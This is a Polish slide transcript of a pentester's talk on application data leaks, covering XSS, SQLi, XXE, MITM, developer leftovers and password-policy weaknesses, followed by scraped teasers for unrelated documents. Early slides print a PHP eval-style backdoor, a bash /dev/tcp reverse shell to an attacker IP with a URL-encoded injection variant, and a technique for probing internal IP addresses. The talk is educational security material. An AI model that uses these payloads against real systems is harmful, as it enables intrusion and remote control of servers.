Wyciek danych w aplikacjach. Artur Michał Kalinowski a.kalinowski@logicaltrust.net
|
|
- Mikołaj Leśniak
- 7 lat temu
- Przeglądów:
Transkrypt
1
2 Wyciek danych w aplikacjach Artur Michał Kalinowski a.kalinowski@logicaltrust.net
3 Bio Artur Michał Kalinowski (amk78) pentester w LogicalTrust wcześniej pentester, administrator, programista,... wykładowca (informatyka śledcza, bezpieczeństwo IT ) współpraca z { gov } w zakresie informatyki śledczej i bezpieczeństwa IT członek zespołu administracyjnego na forum związanym z bezpieczeństwem IT autor książki Metody inwigilacji i elementy informatyki śledczej
4 Testy penetracyjne Audyty bezpieczeństwa Szkolenia Konsultacje Informatyka śledcza Aplikacje mobilne > 10 lat - testy bezpieczeństwa Edukacja: ~ 8 lat blogowania o cyberprzestępcach Confidence, SEMAFOR, SECURE, Atak i Obrona, Security Case Study, Internet Banking Security, ISSA, SecureCON, SEConference, SekIT, PTI, Open Source Security, PLNOG ( )
5 Wyciek danych Źródło: Źródło: Źródło: Google
6 Wyciek danych Źródło: Czym jest wyciek danych i z czego często wynika niewiedza, brak motywacji, brak polityk, wzorców, zasad niewłaściwe środowisko, konfiguracja, brak odpowiednich rozwiązań presja czasu, budżet (przesunięcia, cięcia, ograniczenia) chęć zemsty, sławy
7 Wyciek danych Wycieki danych przypadkowe / niezamierzone (np. na skutek błędów) celowe (np. pozostawione celowo luki) prowokowane (np. celowe doprowadzenie do wycieku poprzez zainicjowanie odpowiednich działań) Źródło:
8 Wyciek danych $_GET['a']($_GET['b']); np. system("cat /etc/passwd"); Niektóre wycieki danych mogą być wynikiem celowo pozostawionych furtek.
9 Wyciek danych Reverse shell z użyciem basha: bash -i >& /dev/tcp/ip_atakujacego/443 0>&1 tworzymy odpowiedni plik po stronie serwera, który następnie uruchamiamy: echo "/bin/bash -i >& /dev/tcp/ip_atakujacego/443 0>&1" > b && /bin/bash b pamiętamy o odpowiednim kodowaniu: php -r "echo urlencode('echo \"/bin/bash -i >& /dev/tcp/ip_atakujacego/443 0>&1\" > b && /bin/bash b');" echo+%22%2fbin%2fbash+-i+%3e%26+%2fdev%2ftcp %2FIP_ATAKUJACEGO%2F443+0%3E%261%22+%3E+b+%26%26+ %2Fbin%2Fbash+b
10 Wyciek danych umieszczamy dane w URLu... w efekcie serwer łączy się z nami i uzyskujemy dostęp do wiersza poleceń:
11 Wyciek danych Częste przyczyny i źródła wycieku danych przykład pozyskanie IP z sieci wewnętrznej 1) zmiana wersji protokołu z HTTP/1.1 na HTTP/1.0 2) usunięcie pola host z nagłówka żądania w efekcie: atakujący zna IP serwera atakujący zna adresację w sieci, w której znajduje się serwer proste wykorzystanie: img z adresem z ujawnionej puli + /icons/right.gif zdarzenie onload lub onerror wysłanie linka do spreparowanej strony użytkownikowi w firmie
12 Wyciek danych W efekcie uzyskujemy adresy IP z sieci wewnętrznej, na których uruchomiony jest, z dużym prawdopodobieństwem, serwer Apache. Analogicznie, na podstawie charakterystycznych lokalizacji zasobów, można zidentyfikować również obecność innych aplikacji w sieci lokalnej.
13 Wyciek danych Częste przyczyny i źródła wycieku danych system m.in. : niewłaściwa konfiguracja (np. dostępu, aktualizacji, ochrony danych, wpad), zrzuty pamięci (np. w wyniku błędów bądź inicjowane przez użytkownika) system plików: pliki tymczasowe pliki wymiany, hibernacji metadane usunięte pliki slack space Źródło:
14 Wyciek danych WPAD
15 Wyciek danych zrzut pamięci procesu (procdump + strings + find)
16 Wyciek danych analiza zrzutu pamięci RAM - Volatility
17 Wyciek danych pozyskiwanie danych z pagefile.sys (foremost)
18 Wyciek danych Process Monitor jest jak drogowskaz :)
19 Wyciek danych Jeżeli współdzielimy komputer, to po naszym wylogowaniu inni nadal się mogą o nas sporo dowiedzieć! choć nie wszystkim byśmy się chcieli chwalić :) /flushdns!!!
20 Wyciek danych Częste przyczyny i źródła wycieku danych usługi: banery, dane w nagłówkach odpowiedzi, informacje o systemie i komponentach, komunikaty o błędach, znane zasoby, pliki konfiguracyjne (w tym też.htaccess, robots.txt, a czasem nawet.bash_history).csv,.svn,.git, /server-status, /status, VRFY
21 Wyciek danych Częste przyczyny i źródła wycieku danych W przykładzie wykorzystano apache.org. W celu zobrazowania ewentualnego wycieku danych użyto fikcyjnych parametrów.
22 Wyciek danych Częste przyczyny i źródła wycieku danych
23 Wyciek danych Częste przyczyny i źródła wycieku danych aplikacje m.in. : pliki konfiguracyjne, includowane, intuicyjne nazwy zasobów, walidacja jedynie po stronie UI, niewłaściwe filtrowanie potencjalnie szkodliwego kodu, poleganie na danych wejściowych z niezaufanych źródeł, niewłaściwa obsługa uploadu plików, brak weryfikacji integralności plików danych lub konfiguracji, brak zaciemniania kodu, niewłaściwe miejsca składowania danych, logowanie danych wrażliwych, metadane...
24 Wyciek danych Efekt: błędy, stare pliki, listowanie katalogów... Źródło: Google
25 Wyciek danych Efekt: metadane Źródło: Google
26 Wyciek danych Efekt: wyciek danych logowania
27 Wyciek danych Efekt: wyciek danych logowania
28 Wyciek danych Częste przyczyny i źródła wycieku danych dane: backupy (w tym niewłaściwa polityka składowania, przesyłu, usuwania) statystyki, logi, dane przykładowe/testowe pliki z metadanymi (dokumenty, grafika) użytkownicy: wklejenie danych ze schowka, użycie podobnych haseł, omyłkowe użycie haseł, przesłanie danych (np. chęć pomocy, pokazania czegoś ciekawego) przesłanie danych w złe miejsce (np. wydruk), pozostawienie wydruku, niewłaściwe zniszczenie danych (np. wyrzucenie do kosza błędnie/częściowo wydrukowanych dokumentów)
29 Błędne założenia projektowe Brak uwzględnienia kwestii bezpieczeństwa Niewłaściwa walidacja danych Niewłaściwa ochrona komunikacji Niewłaściwe składowanie danych Niewłaściwe zarządzanie uprawnieniami Niewłaściwe oczyszczanie danych... Źródło:
30 Błędne założenia projektowe Źródło:
31 Błędne założenia projektowe
32 Błędne założenia projektowe
33 Typowe błędy, które niosą poważne konsekwencje XSS Niewłaściwie oczyszczane dane wejściowe umożliwiają osadzenie własnego kodu, a przez to przejęcie kontroli nad treścią wyświetlanej strony. śledzenie działań użytkownika dostęp do treści przeznaczonej dla danego użytkownika (w tym informacji wrażliwych) możliwość modyfikacji treści (manipulacji danymi, osadzenia szkodliwych treści np. plików) przekierowanie na fałszywą stronę (phishing)
34 Typowe błędy, które niosą poważne konsekwencje XSS pozyskanie hasła
35 Typowe błędy, które niosą poważne konsekwencje XSS w połączeniu z Metasploitem
36 Typowe błędy, które niosą poważne konsekwencje SQLi Często widoczne fragmenty zapytań bądź nawet danych. Informacje o błędach ujawniające rodzaj stosowanego rozwiązania, charakterystyczne zachowanie, opóźnienia czasowe itp. pozyskanie informacji o środowisku pozyskanie informacji o użytkownikach pozyskanie danych z bazy manipulacja danymi (np. zmiana sald) dodanie użytkownika do systemu podwyższenie uprawnień użytkowników dostęp do plików umieszczenie złośliwych skryptów, dostęp do konsoli
37 Typowe błędy, które niosą poważne konsekwencje
38 Typowe błędy, które niosą poważne konsekwencje
39 Typowe błędy, które niosą poważne konsekwencje
40 Typowe błędy, które niosą poważne konsekwencje
41 Typowe błędy, które niosą poważne konsekwencje SQLi to nie tylko strony internetowe. *dane i nazwy przykładowe, ewentualna zbieżność z rzeczywistymi danymi przypadkowa
42 Typowe błędy, które niosą poważne konsekwencje Wyciśnijmy z aplikacji 150% normy :)
43 Typowe błędy, które niosą poważne konsekwencje MITM + MSSQL spoofing (jeżeli aplikacja nie weryfikuje tożsamości serwera)
44 Typowe błędy, które niosą poważne konsekwencje XXE Pozyskanie danych z systemu; plików konfiguracyjnych, listy użytkowników, danych o środowisku... zakłócenie pracy aplikacji (DoS) pozyskanie kodu źródłowego np..php, w tym ujawnienie danych dostępowych do baz itp....
45 Typowe błędy, które niosą poważne konsekwencje XXE pozyskanie listy użytkowników systemu
46 Typowe błędy, które niosą poważne konsekwencje XXE odczyt plików.php (najpierw szukamy...)
47 Typowe błędy, które niosą poważne konsekwencje XXE odczytanie zawartości pliku php
48 Typowe błędy, które niosą poważne konsekwencje Brak szyfrowania danych nieuprawniony dostęp do informacji i jej ujawnienie pozyskanie danych uwierzytelniających działania w imieniu uprawnionego użytkownika manipulacja przesyłanymi danymi zakłócenie pracy aplikacji...
49 Typowe błędy, które niosą poważne konsekwencje MITM - pozyskanie przesyłanych danych
50 Typowe błędy, które niosą poważne konsekwencje Wykorzystanie przewidywalnych wartości Brak zaciemnienia kodu Odsyłanie informacji o błędach Użycie niewłaściwych funkcji Niewłaściwe wytwarzanie oprogramowania możliwe debugowanie, brak ochrony stosu, pozostawianie dokumentacji roboczej i informacji o błędach w publicznym miejscu, wykorzystanie gotowego kodu z innych aplikacji bez uwzględniania specyfikacji obecnych wymagań,...
51 Typowe błędy, które niosą poważne konsekwencje
52 Pozostałości developerskie odwołania do środowiska developerskiego w kodzie zasoby testowe, konsole testowe/developerskie konta testowe informacje logowane w konsoli flagi/parametry umożliwiające uwierzytelnienie funkcje resetowania ustawień, instalatory zasoby związane z rozwojem aplikacji (repozytoria plików, historia zmian, zadania do wykonania, dokumentacja projektowa/testowa) pliki tymczasowe, kopie, stare wersje plików zrzuty pustych baz (struktur) lub stanów początkowych zdalny dostęp, aktywne dodatkowe usługi niewyczyszczone logi oraz dane testowe
53 Pozostałości developerskie
54 Pozostałości developerskie
55 Komentarze szczegółowe opisy kodu (np. parametrów funkcji) ułatwia atakującemu analizę aplikacji i szukanie luk opisy planowanych funkcjonalności (np. tu będzie dodatkowe pole komentarza ) ciekawe czy jest już to po stronie serwera obsługiwane? opisy problemów (np. tu coś się psuło, więc trzeba było wyłączyć ) czy wyłączone tylko w UI, czy po stronie serwera też wyłączona obsługa? coś się psuje dobry trop! zakomentowane fragmenty funkcji oznacza, że z jakiegoś powodu funkcje zostały wyłączone z jakiego?, może coś nie działało jak trzeba? ToDo (np. zrobić walidację, ograniczyć zakres, ograniczyć uprawnienia ) dobrze wiedzieć co nie działa :)
56 Czy stosowanie restrykcyjnych zabezpieczeń ułatwia ataki Podejście atakującego wykorzystać siłę i zasoby przeciwnika przeciwko niemu przykład w firmie stosowane są hasła, które muszą: mieć przynajmniej 12 znaków zawierać zarówno małe jak i wielkie litery zawierać cyfry zawierać znaki specjalne co robi atakujący: przeszukuje zasoby pamięci/danych np. z użyciem np. strings + grep i szuka ciągów, które zawierają jednocześnie: duże i małe litery, cyfry, znaki specjalne i mają przynajmniej 12 znaków dzięki temu znacznie ogranicza zbiór potencjalnych haseł np. z kilkudziesięciu/kilkuset MB (wielkość zrzutu procesu), do około kilku KB (np. 100 możliwych ciągów), które odpowiadają wzorcowi przyjętemu dla hasła atak wymaga jedynie sprawdzenia niewielkiej ilości potencjalnych haseł
57 Czy stosowanie restrykcyjnych zabezpieczeń ułatwia ataki Podejście atakującego wykorzystać siłę i zasoby przeciwnika przeciwko niemu przykład 2 w firmie hasła do systemów i aplikacji są zmieniane co 30 dni: jest wielu użytkowników użytkownicy mają dostęp do wielu systemów/aplikacji muszą się codziennie wiele razy logować jakie wnioski można z tego wyciągnąć atakujący: hasła do systemów i aplikacji będą podobne użytkownicy użyją schematów np. będą tworzyć hasła w oparciu o miesiące lub wybrane słowo i kolejne dni pozyskanie hasła do jednej z aplikacji otwiera furtkę do innych
58 Aplikacje mobilne a bezpieczeństwo Częste błędy: brak zabezpieczeń kryptograficznych dla istotnych danych wrażliwe informacje zapisywane do logów brak weryfikacji certyfikatów dane zapisywane na karcie SD zła randomizacja brak zaciemnienia kodu osadzanie haseł i innych wrażliwych danych w aplikacji api mobilne mniej restrykcyjne w stosunku do restrykcji w przypadku stron WWW
59 Aplikacje mobilne a bezpieczeństwo
60 Aplikacje mobilne a bezpieczeństwo
61 Podsumowanie nawet pozornie nieszkodliwe informacje mogą być cenną wskazówką dla atakującego jeżeli jakieś dane wyciekną do Internetu, to najprawdopodobniej zostaną powielone n razy w x miejscach atakujący często może pozyskać dużo istotnych danych pasywnie - bez nawiązywania połączenia z naszymi serwerami/siecią nigdy nie należy zakładać, że atakujący użyje aplikacji zgodnie z jej przeznaczeniem i w spodziewanym środowisku wycieki informacji/danych są zaproszeniem dla atakującego i często prowadzą do przykrych konsekwencji wycieki mogą powstawać w najmniej spodziewanych miejscach, często przez roztargnienie, niedopatrzenie, niewiedzę fałszywy, kontrolowany wyciek może być ciekawą bronią
62 Dziękuję za uwagę Pytania? Prezentowany materiał przeznaczony wyłącznie do celów edukacyjnych. Wszelkie nazwy, zdjęcia, znaki firmowe i towarowe niebędące własnością prelegenta oraz firmy, należą do ich właścicieli i zostały użyte jedynie w celach informacyjnych.
63
SQL z perspektywy hakera - czy Twoje dane są bezpieczne? Krzysztof Bińkowski MCT,CEI,CEH,ECSA,ECIH,CLFE,MCSA,MCSE..
SQL z perspektywy hakera - czy Twoje dane są bezpieczne? Krzysztof Bińkowski MCT,CEI,CEH,ECSA,ECIH,CLFE,MCSA,MCSE.. Cel prezentacji Spojrzymy na dane i serwery SQL z perspektywy cyberprzestępcy, omówimy
Bardziej szczegółowoz testów penetracyjnych
SECURE / 2012 Nietuzinkowe przypadki z testów penetracyjnych czyli historia o wyższości wyborowego zespołu nad automatycznymi narzędziami Borys Łącki Borys Łącki testy penetracyjne, audyty, szkolenia,
Bardziej szczegółowoWINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8.
WINDOWS Instalacja serwera WWW na systemie Windows XP, 7, 8. Gdy już posiadamy serwer i zainstalowany na nim system Windows XP, 7 lub 8 postawienie na nim serwera stron WWW jest bardzo proste. Wystarczy
Bardziej szczegółowoZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ
ZAŁĄCZNIK Nr 3 do CZĘŚCI II SIWZ WYMAGANIA BEZPIECZEŃSTWA DLA SYSTEMÓW IT Wyciąg z Polityki Bezpieczeństwa Informacji dotyczący wymagań dla systemów informatycznych. 1 Załącznik Nr 3 do Część II SIWZ Wymagania
Bardziej szczegółowoZAŁĄCZNIK Nr 1 do CZĘŚCI II SIWZ
ZAŁĄCZNIK Nr 1 do CZĘŚCI II SIWZ WYMAGANIA BEZPIECZEŃSTWA DLA SYSTEMÓW IT Wyciąg z Polityki Bezpieczeństwa Informacji dotyczący wymagań dla systemów informatycznych. 1 Załącznik Nr 1 do Część II SIWZ SPIS
Bardziej szczegółowoZłośliwe oprogramowanie Sandrorat (podszywające się pod oprogramowanie Kaspersky) na platformę Android WYNIKI ANALIZY
Złośliwe oprogramowanie Sandrorat (podszywające się pod oprogramowanie Kaspersky) na platformę Android WYNIKI ANALIZY 4 sierpnia 2014 r. W dniach 1 do 4 sierpnia 2014 r. poddaliśmy analizie oprogramowanie
Bardziej szczegółowoDiagnostyka komputera
Diagnostyka komputera Lista prawdopodobnych przyczyn usterki komputera na podstawie opisu objawów System może być zainfekowany szkodliwym oprogramowaniem np. wirusy, spyware, adware, robaki, trojany, keyloggery.
Bardziej szczegółowo1. Zakres modernizacji Active Directory
załącznik nr 1 do umowy 1. Zakres modernizacji Active Directory 1.1 Opracowanie szczegółowego projektu wdrożenia. Określenie fizycznych lokalizacji serwerów oraz liczby lokacji Active Directory Określenie
Bardziej szczegółowoZadanie 1 Treść zadania:
Zadanie 1 Treść zadania: 1 2 Komentarz do zadania: Ocenie podlegały następujące elementy projektu: 1. Tytuł pracy egzaminacyjnej. 2. Założenia do projektu. 3. Lista prawdopodobnych przyczyn usterki systemu
Bardziej szczegółowoProgram kadrowo płacowy - wersja wielodostępna z bazą danych Oracle SQL Server 8 lub 9
Program kadrowo płacowy - wersja wielodostępna z bazą danych Oracle SQL Server 8 lub 9 Uwaga: Masz problem z programem lub instalacją? Nie możesz wykonać wymaganej czynności? Daj nam znać. W celu uzyskania
Bardziej szczegółowobla bla Guard podręcznik użytkownika
bla bla Guard podręcznik użytkownika Guard Guard: podręcznik użytkownika data wydania środa, 03. wrzesień 2014 Version 1.0 Copyright 2006-2014 OPEN-XCHANGE Inc., Niniejszy dokument stanowi własność intelektualną
Bardziej szczegółowoInstrukcja zarządzania systemem informatycznym służącym do przetwarzania danych osobowych w Urzędzie Miasta Lublin
w sprawie wprowadzenia Polityki bezpieczeństwa danych osobowych i Instrukcji zarządzania systemem informatycznym służącym do przetwarzania danych osobowych w Urzędzie Miasta Lublin Instrukcja zarządzania
Bardziej szczegółowoAudyt w zakresie bezpieczeństwa informacji w Wojewódzkim Urzędzie Pracy w Lublinie
Załącznik nr 1 do zapytania ofertowego z dn. 19.07.2017 r. SZCZEGÓŁOWY OPIS PRZEDMIOTU ZAMÓWIENIA Audyt w zakresie bezpieczeństwa informacji w Wojewódzkim Urzędzie Pracy w Lublinie 1. Dokonanie oceny zgodności
Bardziej szczegółowocat /agenda.txt /wybrane_fakty_i_mity grep zweryfikowane
Bezpieczeństwo urządzeń mobilnych Fakty i mity Artur Maj, Prevenity cat /agenda.txt /urządzenia_mobilne /wybrane_fakty_i_mity grep zweryfikowane /stan_na_styczeń_2012 /w_oparciu_o_obecną_wiedzę /istnieją_metody_ataków
Bardziej szczegółowoHosting WWW Bezpieczeństwo hostingu WWW. Dr Michał Tanaś (http://www.amu.edu.pl/~mtanas)
Hosting WWW Bezpieczeństwo hostingu WWW Dr Michał Tanaś (http://www.amu.edu.pl/~mtanas) Najgroźniejsze ataki na serwer WWW Najgroźniejsze ataki na serwer WWW Cross-site scripting (XSS) SQL injection Denial
Bardziej szczegółowo- w firmie AGD, w komputerze używanym przez sekretarkę oraz trzech akwizytorów stwierdzono usterkę systemu komputerowego,
1. Projekt realizacji prac prowadzących do zlokalizowania i usunięcia usterek systemu komputerowego, w zakresie diagnozowania wstępnego, ustalenia przyczyn usterek i usunięcia usterek. 2. Założenia do
Bardziej szczegółowoInformatyka Śledcza jako narzędzie zabezpieczania i analizy wrażliwych danych
Informatyka Śledcza jako narzędzie zabezpieczania i analizy wrażliwych danych Daniel Suchocki Dyrektor Generalny Maciej Karmoliński Dyrektor Operacyjny 1. Przepisy i procedury Incydenty naruszenia bezpieczeństwa
Bardziej szczegółowoAgenda. Quo vadis, security? Artur Maj, Prevenity
Quo vadis, security? Artur Maj, Prevenity Agenda 1. Bezpieczeostwo informacji rys historyczny 2. Najistotniejsze wyzwania bezpieczeostwa - obecnie i w najbliższym czasie 3. Nasze rekomendacje 1 Bezpieczeostwo
Bardziej szczegółowoKomentarz technik teleinformatyk 312[02]-02 Czerwiec 2009
Strona 1 z 16 Strona 2 z 16 Strona 3 z 16 W pracy egzaminacyjnej podlegały ocenie: I. Tytuł pracy egzaminacyjnej. II. Założenia wynikające z treści zadania i załączonej dokumentacji. III. Wykaz działań
Bardziej szczegółowoSieci bezprzewodowe WiFi
Sieci bezprzewodowe WiFi przegląd typowych ryzyk i aspektów bezpieczeństwa IV Konferencja Bezpieczeństwa Informacji Katowice, 25 czerwca 2013r. Grzegorz Długajczyk ING Bank Śląski Czy sieci bezprzewodowe
Bardziej szczegółowoBezpieczeństwo systemów komputerowych
Bezpieczeństwo systemów komputerowych Jak pisać poprawne programy? Aleksy Schubert (Marcin Peczarski) Instytut Informatyki Uniwersytetu Warszawskiego 6 listopada 2018 Na podstawie: David A. Wheeler Secure
Bardziej szczegółowoINSTRUKCJA OBSŁUGI DLA SIECI
INSTRUKCJA OBSŁUGI DLA SIECI Zapisywanie dziennika druku w lokalizacji sieciowej Wersja 0 POL Definicje dotyczące oznaczeń w tekście W tym Podręczniku użytkownika zastosowano następujące ikony: Uwagi informują
Bardziej szczegółowoWindows Serwer 2008 R2. Moduł 5. Zarządzanie plikami
Windows Serwer 2008 R2 Moduł 5. Zarządzanie plikami Sprawdzamy konfigurację kart sieciowych 172.16.x.0 x nr w dzienniku Na serwerze musi działać Internet! Statyczny adres IP jest potrzebny komputerom,
Bardziej szczegółowo- komputer (stacja robocza) ma być naprawiony i skonfigurowany w siedzibie firmy,
1. Projekt realizacji prac prowadzących do zlokalizowania i usunięcia usterek systemu komputerowego, zgłoszonych do serwisu InfKomp przez właściciela firmy ROLMASZ, w zakresie: diagnozowania wstępnego,
Bardziej szczegółowoPolityka prywatności dla strony ELCEN Sp. z o.o. z siedzibą w Gdyni
Polityka prywatności dla strony http://elcen.eu ELCEN Sp. z o.o. z siedzibą w Gdyni ELCEN Sp. z o.o. z siedzibą w Gdyni przestrzega przepisów w zakresie ochrony danych osobowych klientów, kontrahentów
Bardziej szczegółowoekopia w Chmurze bezpieczny, zdalny backup danych Instrukcja użytkownika dla klientów systemu mmedica
ekopia w Chmurze bezpieczny, zdalny backup danych Instrukcja użytkownika dla klientów systemu mmedica Wersja 2.0 Data ostatniej aktualizacji: 07.03.2016 Spis treści 1 Wstęp... 3 2 Minimalne wymagania środowiska
Bardziej szczegółowoPROCEDURY ZARZĄDZANIA SYSTEMEM INFORMATYCZNYM
Urząd Gminy Kęty Dokument Systemu Zarządzania Bezpieczeństwem Informacji PROCEDURY ZARZĄDZANIA SYSTEMEM INFORMATYCZNYM ZATWIERDZENIE DOKUMENTU Sporządził Sprawdził Zatwierdził Volvox Consulting Pełnomocnik
Bardziej szczegółowoOpracowanie protokołu komunikacyjnego na potrzeby wymiany informacji w organizacji
Opracowanie protokołu komunikacyjnego na potrzeby wymiany informacji w organizacji Robert Hryniewicz Promotor: dr inż. Krzysztof Różanowski Cele pracy Opracowanie protokołu komunikacyjnego służącego do
Bardziej szczegółowoBezpieczeństwo aplikacji i urządzeń mobilnych w kontekście wymagań normy ISO/IEC 27001 oraz BS 25999 doświadczenia audytora
Bezpieczeństwo aplikacji i urządzeń mobilnych w kontekście wymagań normy ISO/IEC 27001 oraz BS 25999 doświadczenia audytora Krzysztof Wertejuk audytor wiodący ISOQAR CEE Sp. z o.o. Dlaczego rozwiązania
Bardziej szczegółowoBiblioteki publiczne
Instrukcja pracy w programie do gromadzenia danych statystycznych w ramach projektu Analiza Funkcjonowania Bibliotek Biblioteki publiczne Spis treści 1. Użytkownicy i uprawnienia 1 2. Logowanie/rejestracja
Bardziej szczegółowoBiblioteki publiczne
Instrukcja pracy w programie do gromadzenia danych statystycznych w ramach projektu Analiza Funkcjonowania Bibliotek Biblioteki publiczne Spis treści 1. Użytkownicy i uprawnienia 1 2. Logowanie/rejestracja
Bardziej szczegółowoOdczyty 2.0 Spis treści
Opracowanie i skład: MMSoft s.c Copyright MMSoft s.c. Wszelkie prawa zastrzeżone. All Rights Reserved Powielanie w jakiejkolwiek formie całości lub fragmentów podręcznika bez pisemnej zgody firmy MMSoft
Bardziej szczegółowoZasady bezpiecznego korzystania z bankowości elektronicznej
Zasady bezpiecznego korzystania z bankowości elektronicznej 1. Zawsze sprawdzaj na stronie logowania bankowości elektronicznej aktualne zasady bezpiecznego korzystania z bankowości elektronicznej. 2. Szczegółowe
Bardziej szczegółowoMWS Mobile by CTI. Instrukcja
MWS Mobile by CTI Instrukcja Spis treści 1. Opis programu... 3 2. Wymagania... 4 2.1. Etykiety... 5 3. Pierwsze uruchomienie... 6 4. Logowanie... 7 5. Menu główne... 8 6. Opcje... 9 7. Przyjęcie magazynowe...
Bardziej szczegółowoPełna specyfikacja pakietów Mail Cloud
Pełna specyfikacja pakietów Powierzchnia dyskowa W ramach poczty dostępna jest powierzchnia dyskowa od 25 GB. Można nią zarządzać indywidualnie w ramach konta pocztowego. Liczba kont e-mail W ramach poczty
Bardziej szczegółowoKomentarz technik teleinformatyk 312[02]-01 Czerwiec 2009
Strona 1 z 20 Strona 2 z 20 Strona 3 z 20 W pracy egzaminacyjnej podlegały ocenie: I. Tytuł pracy egzaminacyjnej. II. Założenia wynikające z treści zadania i załączonej dokumentacji. III. Wykaz działań
Bardziej szczegółowoINSTALACJA I KONFIGURACJA. 1.1. Instalacja systemu WF-Mag Mobile 2
INSTALACJA I KONFIGURACJA 1.1. Instalacja systemu WF-Mag Mobile 2 System WF-Mag Mobile 2 dostępny jest na jednej płycie instalacyjnej wraz z innymi aplikacjami Asseco WAPRO. Oprócz aplikacji wchodzących
Bardziej szczegółowoZasady Wykorzystywania Plików Cookies
Zasady Wykorzystywania Plików Cookies Definicje i objaśnienia używanych pojęć Ilekroć w niniejszym zbiorze Zasad wykorzystywania plików Cookies pojawia się któreś z poniższych określeń, należy rozumieć
Bardziej szczegółowoSnifery wbudowane w Microsoft Windows
Snifery wbudowane w Microsoft Windows Prezentację przygotowali: Robert Milczarski Łukasz Stegliński Maciej Łaski Network Monitorw w Microsoft Windows Server 2003 Wbudowany w Windows monitor sieci wykorzystywany
Bardziej szczegółowo- w związku ze stwierdzoną usterką właściciel firmy wezwał serwis komputerowy w celu jej zdiagnozowania i usunięcia,
1. Projekt realizacji prac prowadzących do zlokalizowania i usunięcia usterek systemu komputerowego, w zakresie diagnozowania wstępnego, ustalenia przyczyn usterek i usunięcia usterek. 2. Założenia do
Bardziej szczegółowoS P I S T R E Ś C I. Instrukcja obsługi
S P I S T R E Ś C I Instrukcja obsługi 1. Podstawowe informacje o programie.................................................................................... 2 2. Instalacja programu.....................................................................................................
Bardziej szczegółowoJęzyki programowania wysokiego poziomu. PHP cz.3. Formularze
Języki programowania wysokiego poziomu PHP cz.3. Formularze Formularze Sposób przesyłania danych formularza do serwera zależy od wybranej metody HTTP: Metoda GET
Bardziej szczegółowoJednym z najważniejszych zagadnień, z którym może się zetknąć twórca
Uwierzytelnianie w PHP 01 Jednym z najważniejszych zagadnień, z którym może się zetknąć twórca stron internetowych, jest identyfikacja i uwierzytelnienie uprzywilejowanego użytkownika. Od zaprojektowania
Bardziej szczegółowoZASADY KORZYSTANIA Z PLIKÓW COOKIES ORAZ POLITYKA PRYWATNOŚCI W SERWISIE INTERNETOWYM PawłowskiSPORT.pl
ZASADY KORZYSTANIA Z PLIKÓW COOKIES ORAZ POLITYKA PRYWATNOŚCI W SERWISIE INTERNETOWYM PawłowskiSPORT.pl Niniejsze zasady dotyczą wszystkich Użytkowników strony internetowej funkcjonującej w domenie http://www.pawlowskisport.pl,
Bardziej szczegółowoBEZPIECZEŃSTWO BANKOWOŚCI KORPORACYJNEJ
BEZPIECZEŃSTWO BANKOWOŚCI KORPORACYJNEJ Zachowania użytkownika, a ryzyko wykonywania operacji finansowych przez Internet. Bankowość elektroniczna jest wygodną i bezpieczną formą korzystania z usług bankowych,
Bardziej szczegółowoPHICS - Polish Harbours Information & Control System Dokumentacja użytkownika System weryfikacji autentyczności polskich dokumentów marynarzy
PHICS - Polish Harbours Information & Control System Dokumentacja użytkownika System weryfikacji autentyczności polskich dokumentów marynarzy Zielona Góra, kwiecień 2014 DOKUMENTACJA ZMIAN: Lp. Wersja
Bardziej szczegółowoekopia w Chmurze bezpieczny, zdalny backup danych
ekopia w Chmurze bezpieczny, zdalny backup danych Instrukcja użytkownika dla klientów systemu mmedica Wersja 1.0 Data ostatniej aktualizacji: 25.03.2015 Spis treści 1 Wstęp... 3 2 Rejestracja... 4 3 Korzystanie
Bardziej szczegółowoi częstotliwość tworzenia kopii, zasady sprawdzania obecności wirusów komputerowych oraz dokonywania przeglądów i konserwacji systemów.
1 i częstotliwość tworzenia kopii, zasady sprawdzania obecności wirusów komputerowych oraz dokonywania przeglądów i konserwacji systemów. W związku z tym, że system informatyczny przetwarzający dane osobowe
Bardziej szczegółowoKONFIGURACJA USŁUGI ZSIMED NA SERWERZE ZDALNYM
KONFIGURACJA USŁUGI ZSIMED NA SERWERZE ZDALNYM Spis treści Wstęp... 2 1. Zarządzanie usługą... 2 1.1. Instalacja usługi ZSIMED... 2 1.2. Inicjowanie usługi ZSIMED... 3 1.3. Zatrzymanie usługi... 3 1.4.
Bardziej szczegółowoWykaz zmian w programie WinAdmin Replikator
Wykaz zmian w programie WinAdmin Replikator Pierwsza wersja programu 1.0.0.1 powstała w czerwcu 2010. kod źródłowy programu zawiera ponad 6 900 wierszy. Modyfikacje/zmiany w wersji 1.0.4.0 (październik
Bardziej szczegółowoZagrożenia związane z udostępnianiem aplikacji w sieci Internet
Zagrożenia związane z udostępnianiem aplikacji w sieci Internet I Ogólnopolska Konferencja Informatyki Śledczej Katowice, 8-9 stycznia 2009 Michał Kurek, Aleksander Ludynia Cel prezentacji Wskazanie skali
Bardziej szczegółowoAudytowane obszary IT
Załącznik nr 1 do OPZ Zakres audytu wewnętrznego Audytowane obszary IT Audyt bezpieczeństwa wewnętrznego odbywać się będzie w 5 głównych obszarach 1) Audyt konfiguracji systemów operacyjnych na wybranych
Bardziej szczegółowoPolityka prywatności Spółdzielni Mieszkaniowej Słoneczny Stok
Polityka prywatności Spółdzielni Mieszkaniowej Słoneczny Stok Spółdzielnia Mieszkaniowa Słoneczny Stok szanuje prawo do prywatności Użytkowników serwisu sm-slonecznystok.pl. W szczególności dba o ochronę
Bardziej szczegółowoProjektowani Systemów Inf.
Projektowani Systemów Inf. Wykład VII Bezpieczeństwo Copyrights by Arkadiusz Rzucidło 1 Bezpieczeństwo Bezpieczeństwo związane z danymi Konstrukcja magazynów danych Mechanizmy zapisu i modyfikacji danych
Bardziej szczegółowoZBIÓR DOBRYCH PRAKTYK KORZYSTANIA Z BANKOWOŚCI ELEKTRONICZNEJ
ZBIÓR DOBRYCH PRAKTYK KORZYSTANIA Z BANKOWOŚCI ELEKTRONICZNEJ RZESZÓW, 2015 Bankowość elektroniczna w Centrum Usług Internetowych I. Zasady bezpiecznego korzystania z bankowości elektronicznej 1. Zawsze
Bardziej szczegółowoPolityka prywatności serwisów internetowych Narodowego Instytutu Architektury i Urbanistyki (NIAiU) i plików cookies
Polityka prywatności serwisów internetowych Narodowego Instytutu Architektury i Urbanistyki (NIAiU) i plików cookies Polityka prywatności realizowana przez serwisy: www.niaiu.pl; Letnie Studium Miasta
Bardziej szczegółowoZPKSoft WDoradca. 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja
